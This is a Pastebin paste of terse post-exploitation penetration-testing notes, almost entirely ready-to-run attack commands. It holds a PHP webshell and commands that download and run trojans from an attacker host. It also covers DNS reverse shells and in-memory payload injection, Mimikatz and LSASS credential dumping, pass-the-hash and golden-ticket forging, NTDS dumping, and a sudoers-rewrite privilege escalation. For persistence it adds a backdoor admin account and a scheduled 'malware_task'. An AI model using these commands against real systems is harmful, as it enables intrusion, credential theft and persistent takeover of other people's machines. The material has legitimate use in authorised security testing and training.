Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #https://raw.githubusercontent.com/w4fz5uck5/Pentest-notes/master/POST_exploitation.txt
- CYTHON:
- sudo pip install cython
- mv test.py test.pyx
- cython test.pyx --embed
- <python 3>
- gcc -Os -I /usr/include/python3.5m -o test test.c -lpython3.5m -lpthread -lm -lutil -ldl
- <python 2>
- gcc -Os -I /usr/include/python2.7 -o test test.c -lpython2.7 -lpthread -lm -lutil -ldl
- LIKE A BOSS PHP WEBSHELL:
- <?=($_=@$_GET[0]).@$_($_GET[1]);
- |
- -> 127.0.0.1?0=system&1=ls -la
- DOWNLOAD/EXECUTE FILES WITHOUT POWERSHELL:
- # attacker machine: python -m SimpleHTTPServer 80
- certutil -urlcache -split -f attacker.com/trojan.exe %TEMP%\trojan.exe && %TEMP%\trojan.exe
- # attacker machine: msfvenom -p windows/shell_reverse_tcp lhost=192.168.0.104 lport=31337 -f msi > trojan.msi
- # attacker machine: python -m SimpleHTTPServer 80
- msiexec /q /i http://attacker.com/trojan.msi
- # attacker machine: atftpd --daemon --port 69 /tmp
- tftp -i attacker.com GET trojan.exe %TEMP%\trojan.exe && %TEMP%\trojan.exe
- # attacker machine: python -m SimpleHTTPServer 80
- bitsadmin /transfer n http://attacker.com/trojan.exe %TEMP%\trojan.exe && %TEMP%\trojan.exe
- # attacker machine: twistd -n ftp -p 21
- ftp 127.0.0.1 username password get file exit
- ANTIVIRUS:
- sc query Windefend #Check for windows defender
- SHOW HOTFIXES:
- wmic qfe get Caption,Description,HotFixID,Installedon
- DNS reverse shell
- |-----------------Dnscat2 powershell METHOD-------------
- '-> https://github.com/iagox86/dnscat2
- |-> ruby dnscat2 dummyc2.net -e open --no-cache # Start dnscat2 server on your c2dummy machine
- | |
- | '-> https://github.com/lukebaggett/dnscat2-powershell # Connect to the server using powershell script
- | '-> Start-Dnscat2 -Domain dummyc2.net -DNSServer <c2IP> -NoEncryption
- |
- |--------------------powercat METHOD--------------------
- '-> https://github.com/iagox86/dnscat2/archive/v0.01.zip
- '-> dnscat2 version 1 (works better):
- |
- -> ruby dnscat2 dummyc2.net # Start dnscat2 server on your c2dummy machine
- | |
- | '-> https://github.com/besimorhino/powercat
- | '-> powercat -c <c2ip> -dns dummyc2.net -p 53 -rep -v -ep -dnsft 20 # Connecting to server using powercat script
- |
- |--------------------iagox86 METHOD--------------------
- '-> https://downloads.skullsecurity.org/dnscat2/
- '-> https://github.com/iagox86/dnscat2
- |
- '-> PS C:\Users\bob\Desktop>
- '-> $PEBytes = [Convert]::FromBase64String((new-object net.webclient).DownloadString("http://c2.net:8000/dnscat.txt"));
- |
- '-> IEX(new-object net.webclient).DownloadString("https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-ReflectivePEInjection.ps1");
- |
- '-> Invoke-ReflectivePEInjection -PEBytes $PEBytes -ExeArgs "--dns domain=c2.net,server=8.8.8.8"
- PASS-THE-HASH:
- Metasploit:
- use exploit/windows/smb/psexec
- pth-smbclient --user=<USER> --pw-nt-hash -m smb3 -L <TARGET_IP> \\\\<TARGET_IP>\\ <SMB HASH>
- pth-winexe -U <DOMAIN>/<USER>%<PASSWORD> --system //<TARGET_IP> cmd.exe
- pth-winexe -U <DOMAIN>/<USER>%00000000000000000000000000000000:<PASSWORD> --system //<TARGET_IP> cmd.exe # NT is not necessary, only LM
- |
- -> https://github.com/byt3bl33d3r/pth-toolkit.git
- DOCKER:
- docker run -v /:/host -t -i bash #privilege escalation: https://fosterelli.co/privilege-escalation-via-docker.html
- Nice and reliable payloads:
- windows/meterpreter_reverse_https
- CREDENTIALS:
- .--
- | From non-auth user to local admin in 3 steps (still to common) Nullsession:
- | net use \\dc\ipc$ "" /u:""
- |
- | Search for cpasswords in gpo's:
- | dir \\dc\sysvol\contoso.corp\Policies -r -I *.xml | Select-String cPassword >> dump.txt
- |
- | Decrypt the cPassword:
- | gpp-decrypt <string>
- \_
- PWDUMP:
- reg save hklm\sam c:\sam
- reg save hklm\system c:\system
- pwdump system sam
- Mimikatz:
- LSASS.DUMP:
- C:\procdump.exe -accepteula -ma lsass.exe lsass.dmp
- mimikatz # sekurlsa::minidump lsass.dmp
- mimikatz # sekurlsa::logonPasswords
- <....>
- GOLDEN TICKET:
- http://rycon.hu/papers/goldenticket.html
- https://bluescreenofjeff.com/2017-05-23-how-to-pass-the-ticket-through-ssh-tunnels/
- https://resources.infosecinstitute.com/pass-hash-pass-ticket-no-pain/#gref
- cmds:
- kerberos::golden /user:utilisateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /id:1107 /groups:513 /ticket:utilisateur.chocolate.kirbi
- sekurlsa::tickets /export
- kerberos::ptt <out-*krbtgt*.kirbi> # Located on mimikatz current work folder
- BYPASSING AV:
- https://github.com/klsecservices/bat-armor/blob/master/examples/krbtgt.bat
- MIMIKATZ PARSER: #https://gist.github.com/Raikia/66ba8279971d16770e94
- Mimikatz 1.0:
- cat mimikatz_dump.txt | grep -P '((Utilisateur principal)|(msv1_0)|(kerberos)|(ssp)|(wdigest)|(tspkg))\s+:\s+.+' | grep -v 'n\.' | sed -e 's/^\s\+[^:]*:\s\+//' | sed -e 's/Utilisateur principal\s\+:\s\+\(.*\)$/\n\1/' | sort -u
- Mimikatz 2.0 (unfortunately, you must "apt-get install pcregrep" because reasons):
- cat mimikatz_dump.txt | pcregrep -M 'Username\s+:\s+[^\s]+\n.*Domain\s+:\s+[^\s]+\n.*Password\s+:\s+[^\s]+\n' | sed "s/'/\\\'/" | xargs -L 3 echo | grep -v '\(null\)' | sed -e 's/* Username : //g;s/* Domain ://g;s/* Password ://g' | awk '{print $2 "\\" $1 ":" $3}' | sort -u
- Domain Controller:
- nltest /dclist:domain.corp #resolve domain DCs names
- crackmapexec -t 20 smb --ntds <IP> -d <domain> -u <username> -p <password> #dump all ntds credentials using clean text password
- crackmapexec -t 20 smb --ntds <IP> -d <domain> -u <username> -H <NTLM> #dump all ntds credentials using hash
- crackmapexec -t 20 smb <IPS.TXT>(or ip/24) -d <domain> -u <username> -H <NTLM> #bruteforce hosts using leaked administrators credentials
- qwinsta # show logged users
- quser
- net groups /domain
- net groups "Domain Admins" /domain
- Exchange Trusted Subsystem // Exchange Windows Permissions:
- https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/
- VNCINJECT:
- use exploit/windows/local/payload_inject
- |
- -> set payload windows/vncinject/reverse_tcp
- TCPDump:
- The machine can communicate with you?
- |
- -> tcpdump -i <interface> src host <target_ip>
- You can communicate with the target machine?
- |
- -> tcpdump -i <interface> dst host <target_ip>
- |
- -> Try to ping to know if that target machine have some connection with your pc.
- Windows:
- WMIC:
- wmic logicaldisk get caption,description,drivetype,providername,volumename # show windows logical disks
- wmic diskdrive list brief /format:list # show windows disks drivers
- Windows Nmap like:
- setspn –Q */*
- certutil.exe:
- certutil -urlcache -split -f <WEBSITE>/backdoor.vbs C:\Windows\System32\backdoor.vbs && cscript .\backdoor.vbs
- cmd.exe /C certutil.exe -urlcache -split -f "https://pastebin.com/raw/2agkDJKs" %TEMP%\p.txt && certutil.exe -f -decode %TEMP%\p.txt %TEMP%\p.exe #download procdump.exe
- bitsadmin:
- bitsadmin /transfer myDownloadJob /download /priority normal http://downloadsrv/10mb.zip c:\10mb.zip
- POWERSHELL:
- Execute commands of another user:
- shellpop --number 9 --reverse --host <IP> --port <PORT>
- put the output in a file called "attack.txt", then:
- $user = "dummy"
- $password = "dummy" | ConvertTo-SecureString -AsPlainText -Force
- $creds = new-object system.management.automation.pscredential($user,$password)
- Start-Process -FilePath powershell.exe -WorkingDirectory "C:\Windows\System32\WindowsPowershell\v1.0\" -Credential $creds -ArgumentList("-nop -ep bypass IEX(new-object System.Net.WebClient).DownloadString('http://10.0.2.15:5252/attack.txt')")
- Powershell -nop -ep bypass -c "$file = Get-Content %TEMP%\b64.txt; Select-Object -Last 666 $file; $file"
- powershell -nop -ep bypass -c "IEX(new-object system.net.WebClient).DownloadString('https://pastebin.com/raw/yUjG8y4Q'); Invoke-MS16-032"
- powershell -nop -ep bypass -File .\scan.ps1 -StartIPv4Address 192.168.1.0 -EndIPv4Address 192.168.1.0/24 -Force
- CACLS Windows permissions:
- Common:
- icacls <PATH> /grant "<USER>":(OI)(CI)M
- Add Read-Only permission to a single file
- CACLS myfile.txt /E /G "Power Users":R
- Add Full Control permission to a second group of users
- CACLS myfile.txt /E /G "FinanceUsers":F
- Now revoke the Read permissions from the first group
- CACLS myfile.txt /E /R "Power Users"
- Now give the first group Full-control:
- CACLS myfile.txt /E /G "Power Users":F
- Give the Finance group Full Control of a folder and all sub folders
- CACLS c:\docs\work /E /T /C /G "FinanceUsers":F
- SCHTASKS:
- schtasks /query /fo LIST /v #query all tasks
- schtasks /query /tn malware_task /V #query single task
- schtasks /create /sc minute /mo 1 /tn "malware_task" /tr "C:\Users\w4fz5uck5\Desktop\work\malware.exe" #each 1 min, the malware is executed
- DPKG LIST:
- dpkg-query -l
- Ports checkup:
- netstat -plunt
- sockstat -l #freebsd
- Ping port scanner:
- for i in $(seq 1 65535); do timeout 0.1 /bin/bash -c "echo &>/dev/tcp/<IP>/$i && echo '$i is open'" 2>/dev/null; done
- Mysql commands:
- mysql -u root --password=toor -e "use users; show tables;"
- mysql -u root --password=toor -e "\!/bin/bash"
- Privesc Linux:
- sudo -l
- find / -perm -2 ! -type l -ls 2>/dev/null
- find / -writable -user <USER> 2>/dev/null
- find / -perm -4000 2>/dev/null
- find / -name <FILE_NAME>
- cat /etc/crontab
- ls -lRa /var/www/html/
- procmon.sh
- rpm -aq
- dirtycow.c
- echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD:ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/updat
- Privesc Windows:
- https://pentestlab.blog/tag/local-exploits/
- rottenpotato.exe
- ms16-032
- taihou32.exe #CVE-2015-1701
- taihou64.exe
- Tater
- post/multi/recon/local_exploit_suggester
- net users w4fz5uck5 h4x00r /add && net localgroup administrators w4fz5uck5 /add
- Web directories:
- /var/www/html #linux
- C:\inetpub\wwwroot #windows
- Portfwd:
- proxytunnel -p 10.0.1.114:3128 -d 127.0.0.1:22 -a 4444 #Used to portfwd in squid proxies.
- socat TCP-LISTEN:<PORT>,reuseaddr,addr TCP:<REMOTE_IP>:<REMOTE_PORT>
- /etc/rinet.conf #Create a proxy for tunneling
- ssh:
- Own all ports:
- shuttle -r <REMOTE_IP> 0/0
- local_tunnel:
- ssh <USER>@127.0.0.1 -L 5500:localhost:5500 # Send my local port to the host who connected in my pc.
- remote_tunnel:
- ssh <USER>@127.0.0.1 -R 127.0.0.1:5500:localhost:5500 # Send my local port to the host who i'm connecting.
- nmap_trough_ssh:
- ssh -D 1080 user@host
- nmap -sS 1.2.3.4 --proxy 127.0.0.1:1080
- PLINK (need ansicon to run without ANSI bugs):
- ansicon.exe plink.exe -ssh test@192.168.0.108 #https://github.com/adoxa/ansicon/releases/download/v1.84/ansi184-bin.zip
- Metapsloit-Meterpreter:
- portfwd add –l 3389 –p 3389 –r <TARGET_HOST>
- Oracle DB:
- metasploit-framework:
- auxiliary/admin/oracle/sid_brute
- auxiliary/admin/oracle/tnscmd
- auxiliary/admin/oracle/oracle_login
- auxiliary/scanner/oracle/sid_brute
- auxiliary/scanner/oracle/sid_enum
- auxiliary/scanner/oracle/tnslsnr_version
- odat:
- Usefull commands:
- get,put,remove:
- python odat.py utlfile 10.10.10.82 -U SCOTT -P tiger -d XE --sysdba --help
- put:
- python odat.py dbmsxslprocessor -s <ip> -U SCOTT -P tiger -d XE --sysdba --putFile 'C:\inetpub\wwwroot\' 'test.txt' 'test.txt'
- read:
- python odat.py ctxsys -s <ip> -U SCOTT -P tiger -d XE --sysdba --getFile 'C:\inetpub\wwwroot\test.txt'
- /*Features
- Thanks to ODAT, you can:
- search valid SID on a remote Oracle Database listener via:
- a dictionary attack
- a brute force attack
- ALIAS of the listener
- search Oracle accounts using:
- a dictionary attack
- each Oracle user like the password (need an account before to use this attack)
- execute system commands on the database server using:
- dbmsscheduler
- java
- externaltables
- oradbg
- download files stored on the database server using:
- utlfile
- external tables
- CTXSYS
- upload files on the database server using:
- utlfile
- dbmsxslprocessor
- dbmsadvisor
- delete files using:
- utlfile
- send/reveive HTTP requests from the database server using:
- utlhttp
- HttpUriType
- scan ports of the local server or a remote server using:
- utlhttp
- HttpUriType
- utltcp
- exploit the CVE-2012-313 (http://cvedetails.com/cve/2012-3137)
- pickup the session key and salt for arbitrary users
- attack by dictionary on sessions*/
- #https://www.kitploit.com/2014/07/odat-oracle-database-attacking-tool.html
- # SPEEDING UP proxying
- # https://www.hackwhackandsmack.com/?p=1021
- proxychains nmap -p 1-1000 -sT -Pn --open -n -T4 --min-parallelism 100 --min-rate 1 --oG proxychains_nmap_old --append-output <IP Address>
- Bringing Xargs into the loop with a thread count of 50 dramatically improves the results and only took 9 seconds to complete. An example of this usage has been shown below:
- seq 1 1000 | xargs -P 50 -I{} proxychains nmap -p {} -sT -Pn --open -n -T4 --min-parallelism 100 --min-rate 1 --oG proxychains_nmap --append-output <IP Address>
- If you want to run multiple ports or port ranges against multiple hosts you could use the following alternative:
- seq 1 254 | xargs -P 50 -I{} proxychains nmap -p 80,443,3389,445,22 -sT -Pn --open -n -T4 --min-parallelism 100 --min-rate 1 --oG proxychains_nmap --append-output 192.168.1.{}
- #TODO
Add Comment
Please, Sign In to add comment